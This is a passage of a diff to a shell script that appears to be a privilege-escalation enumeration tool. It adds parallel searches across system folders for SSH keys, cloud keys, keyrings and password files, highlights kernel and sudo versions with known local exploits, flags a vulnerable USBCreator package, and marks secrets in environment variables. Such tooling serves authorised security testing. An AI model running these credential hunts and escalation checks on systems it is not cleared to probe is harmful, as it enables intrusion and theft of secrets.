$FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_KNOCK_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_PGP_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_LIB=`eval_bckgrd "find /lib/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_RUN=`eval_bckgrd "find /run/ $FIND_DOCKER_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_SYSTEMD=`eval_bckgrd "find /systemd/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_SYSTEM=`eval_bckgrd "find /system/ $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_SYS=`eval_bckgrd "find /sys/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` #MacOS - FIND_USERS=$(eval find /Users/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_USERS" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_PRIVATE=$(eval find /private/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -O $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_PRIVATE" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_APPLICATIONS=$(eval find /Applications/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_APPLICATIONS" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi + FIND_PRIVATE=`eval_bckgrd "find /private/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_PGP_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -O $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /Applications/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + wait # Always wait at the end + CONT_THREADS=0 #Reset the threads counter + ##### POST SERACH VARIABLES ##### + backup_folders=`echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS" | tr ' ' '\n' | grep -v "/lib" | grep -E "backup$|backups$"` + backup_folders_row="`echo $backup_folders | tr '\n' ' '`" printf $Y"DONE\n"$NC + echo "" fi @@ -915,29 +977,48 @@ if [ "`echo $CHECKS | grep SysI`" ]; then ########################################### #-------------) System Info (-------------# ########################################### - printf $B"====================================( "$GREEN"System Information"$B" )====================================\n"$NC + printf $B"════════════════════════════════════╣ "$GREEN"System Information"$B" ╠════════════════════════════════════\n"$NC #-- SY) OS printf $Y"[+] "$GREEN"Operative system\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits\n"$NC -(cat /proc/version || uname -a ) 2>/dev/null | sed -E "s,$kernelDCW_Ubuntu_Precise_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_4,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_5,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Precise_6,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Trusty_4,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Ubuntu_Xenial,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel5_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel5_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel5_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_1,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_2,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_3,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel6_4,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelDCW_Rhel7,${C}[1;31;103m&${C}[0m," | sed -E "s,$kernelB,${C}[1;31m&${C}[0m," +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel7,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelB,${C}[1;31m&${C}[0m," lsb_release -a 2>/dev/null echo "" #-- SY) Sudo printf $Y"[+] "$GREEN"Sudo version\n"$NC - if [ "`which sudo 2>/dev/null`" ]; then + if [ "`command -v sudo 2>/dev/null`" ]; then printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version\n"$NC - sudo -V 2>/dev/null | grep "Sudo ver" | sed -E "s,$sudovB,${C}[1;31m&${C}[0m," + sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${C}[1;31m&${C}[0m," else echo_not_found "sudo" fi echo "" + #--SY) USBCreator + printf $Y"[+] "$GREEN"USBCreator\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation\n"$NC + if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then + pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") + if [ -z "$pc_version" ]; then + pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) + fi + if [ -n "$pc_version" ]; then + pc_length=${#pc_version} + pc_major=$(echo "$pc_version" | cut -d. -f1) + pc_minor=$(echo "$pc_version" | cut -d. -f2) + if [ $pc_length -eq 4 -a $pc_major -eq 0 -a $pc_minor -lt 21 ]; then + echo "Vulnerable!!" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + fi + fi + fi + echo "" + #-- SY) PATH printf $Y"[+] "$GREEN"PATH\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses\n"$NC - echo $OLDPATH 2>/dev/null | sed -E "s,$Wfolders|\./|\.:|:\.,${C}[1;31;103m&${C}[0m,g" - echo "New path exported: $PATH" 2>/dev/null | sed -E "s,$Wfolders|\./|\.:|:\. ,${C}[1;31;103m&${C}[0m,g" + echo $OLDPATH 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${C}[1;31;103m&${C}[0m,g" + echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${C}[1;31;103m&${C}[0m,g" echo "" #-- SY) Date @@ -959,7 +1040,7 @@ if [ "`echo $CHECKS | grep SysI`" ]; then #-- SY) Environment vars printf $Y"[+] "$GREEN"Environment\n"$NC printf $B"[i] "$Y"Any private information inside environment variables?\n"$NC - (env || set) 2>/dev/null | grep -v "RELEVANT*\|FIND*\|^VERSION=\|dbuslistG\|mygroups\|ldsoconfdG\|pwd_inside_history\|kernelDCW_Ubuntu_Precise\|kernelDCW_Ubuntu_Trusty\|kernelDCW_Ubuntu_Xenial\|kernelDCW_Rhel\|^sudovB=\|^rootcommon=\|^mounted=\|^mountG=\|^notmounted=\|^mountpermsB=\|^mountpermsG=\|^kernelB=\|^C=\|^RED=\|^GREEN=\|^Y=\|^B=\|^NC=\|TIMEOUT=\|groupsB=\|groupsVB=\|knw_grps=\|sidG\|sidB=\|sidVB=\|sudoB=\|sudoG=\|sudoVB=\|sudocapsB=\|timersG=\|capsB=\|\notExtensions=\|Wfolders=\|writeB=\|writeVB=\|_usrs=\|compiler=\|PWD=\|LS_COLORS=\|pathshG=\|notBackup=\|processesDump\|processesB\|commonrootdirs" | sed -E "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY],${C}[1;31m&${C}[0m,g" || echo_not_found "env || set" + (env || set) 2>/dev/null | grep -v "RELEVANT*\|FIND*\|^VERSION=\|dbuslistG\|mygroups\|ldsoconfdG\|pwd_inside_history\|kernelDCW_Ubuntu_Precise\|kernelDCW_Ubuntu_Trusty\|kernelDCW_Ubuntu_Xenial\|kernelDCW_Rhel\|^sudovB=\|^rootcommon=\|^mounted=\|^mountG=\|^notmounted=\|^mountpermsB=\|^mountpermsG=\|^kernelB=\|^C=\|^RED=\|^GREEN=\|^Y=\|^B=\|^NC=\|TIMEOUT=\|groupsB=\|groupsVB=\|knw_grps=\|sidG\|sidB=\|sidVB=\|sudoB=\|sudoG=\|sudoVB=\|sudocapsB=\|timersG=\|capsB=\|\notExtensions=\|Wfolders=\|writeB=\|writeVB=\|_usrs=\|compiler=\|PWD=\|LS_COLORS=\|pathshG=\|notBackup=\|processesDump\|processesB\|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY],${C}[1;31m&${C}[0m,g" || echo_not_found "env || set" echo "" #-- SY) Dmesg @@ -970,9 +1051,9 @@ if [ "`echo $CHECKS | grep SysI`" ]; then #-- SY) AppArmor printf $Y"[+] "$GREEN"AppArmor enabled? .............. "$NC - if [ `which aa-status 2>/dev/null` ]; then + if [ `command -v aa-status 2>/dev/null` ]; then aa-status 2>&1 | sed "s,disabled,${C}[1;31m&${C}[0m," - elif [ `which apparmor_status 2>/dev/null` ]; then + elif [ `command -v apparmor_status 2>/dev/null` ]; then apparmor_status 2>&1 | sed "s,disabled,${C}[1;31m&${C}[0m," elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then ls -d /etc/apparmor* @@ -1009,13 +1090,24 @@ if [ "`echo $CHECKS | grep SysI`" ]; then #-- SY) Printer printf $Y"[+] "$GREEN"Printer? ....................... "$NC lpstat -a 2>/dev/null || echo_not_found "lpstat" + + #-- SY) Running in a virtual environment + printf $Y"[+] "$GREEN"Is this a virtual machine? ..... "$NC + hypervisorflag=`cat /proc/cpuinfo 2>/dev/null | grep flags | grep hypervisor` + if [ `command -v systemd-detect-virt 2>/dev/null` ]; then + detectedvirt=`systemd-detect-virt` + if [ "$hypervisorflag" ]; then printf $RED"Yes ("$detectedvirt")"$NC; else printf $GREEN"No"$NC; fi + else + if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi + fi + echo "" #-- SY) Container printf $Y"[+] "$GREEN"Is this a container? ........... "$NC - dockercontainer=`grep -i docker /proc/self/cgroup 2>/dev/null; find / -maxdepth 3 -name "*dockerenv*" -exec ls 